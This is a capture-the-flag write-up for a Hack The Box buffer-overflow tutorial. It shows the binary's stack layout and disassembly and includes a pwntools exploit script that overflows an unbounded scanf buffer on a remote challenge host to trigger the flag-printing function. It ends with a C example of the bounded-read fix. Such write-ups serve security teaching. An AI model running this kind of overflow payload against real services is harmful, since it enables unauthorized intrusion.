hackthebox
Task: tutorial challenge with a 64-bit ELF binary that reads input via scanf with no length check. Solution: overflow the buffer to overwrite the adjacent stack variable and trigger the win condition.
Tutorial challenge for learning buffer overflow basics. Binary file gs — 64-bit ELF with PIE and NX enabled, but no stack canary.
Target: 94.237.63.176:35784

```
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      PIE enabled
```
```
rbp-0x30 (offset -48): Buffer[32 bytes]     <- user input
rbp-0x10 (offset -16): Alignment[8 bytes]   <- initialized to 0x6969696969696969
rbp-0x08 (offset -8):  Target[8 bytes]      <- initialized to 0xdeadbeef
rbp:                   Saved RBP
rbp+0x08:              Return address
```
The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.
```
17c5: movl  $0xdeadbeef, %eax
17ca: cmpq  %rax, -0x8(%rbp)   ; compare target with 0xdeadbeef
17ce: jne   0x17dc             ; if NOT equal — jump to win
...
17dc: callq 0x11f5 <win>       ; win() reads and prints flag.txt
```
If the target value is changed from 0xdeadbeef to anything else — the win() function is called.
Send 40 bytes to fill buffer (32) + alignment (8), then any additional bytes overwrite target.
```
[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
 Buffer(32)   Align(8)  Target(8) <- overwritten!
```
```python
#!/usr/bin/env python3
from pwn import *

IP = '94.237.63.176'
PORT = 35784

r = remote(IP, PORT)

# 40 bytes to reach target, then overwrite it
payload = b'A' * 40 + b'BBBBBBBB'

r.recvuntil(b'>')
r.sendline(payload)
r.recvuntil(b'HTB{', timeout=5)
flag = b'HTB{' + r.recvuntil(b'}')
success(f'Flag: {flag.decode()}')
r.close()
```
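The defender's side of the same bug, as an added example that is not part of the writeup or the challenge binary: a C mirror of the frame described above, with the unbounded read beside a bounded one that uses a scanf width specifier. The struct layout, magic values and the 48-byte input are constructed from the writeup's numbers.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed mirror of the challenge frame described in the writeup:
 * 32-byte input buffer, 8-byte alignment word, 8-byte target. */
struct frame {
    char buf[32];
    uint64_t align;
    uint64_t target;
};

#define ALIGN_MAGIC  0x6969696969696969ULL
#define TARGET_MAGIC 0xdeadbeefULL

/* The binary's pattern: "%s" has no upper bound, so anything longer than
 * 31 bytes spills into align and target. Shown for comparison, not called. */
void read_unbounded(struct frame *f)
{
    scanf("%s", f->buf);
}

/* Hardened version: the width caps the conversion at 31 bytes plus NUL, so
 * nothing past buf is written. Reads from a string so it runs offline; the
 * stdin form is scanf("%31s", f->buf) followed by draining the rest of the
 * line so leftover bytes cannot feed a later read. */
size_t read_bounded(struct frame *f, const char *input)
{
    if (sscanf(input, "%31s", f->buf) != 1)
        f->buf[0] = '\0';
    return strlen(f->buf);
}

/* True if the two words above the buffer still hold their initial values. */
int frame_intact(const struct frame *f)
{
    return f->align == ALIGN_MAGIC && f->target == TARGET_MAGIC;
}

/* Feed the writeup's 48-byte payload (40 x 'A' + 8 x 'B') through the
 * bounded reader; returns 1 if only 31 bytes landed and target survived. */
int bounded_read_survives_overflow(void)
{
    struct frame f = { .align = ALIGN_MAGIC, .target = TARGET_MAGIC };
    char input[49];
    memset(input, 'A', 40);
    memcpy(input + 40, "BBBBBBBB", 8);
    input[48] = '\0';
    return read_bounded(&f, input) == 31 && frame_intact(&f);
}
```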
Use this technique when:

- scanf("%s") or gets() is used without length checking

Files:

- gs — 64-bit ELF binary
- wrapper.py — exploit template
- flag.txt — local test flag
- glibc/ — provided libc files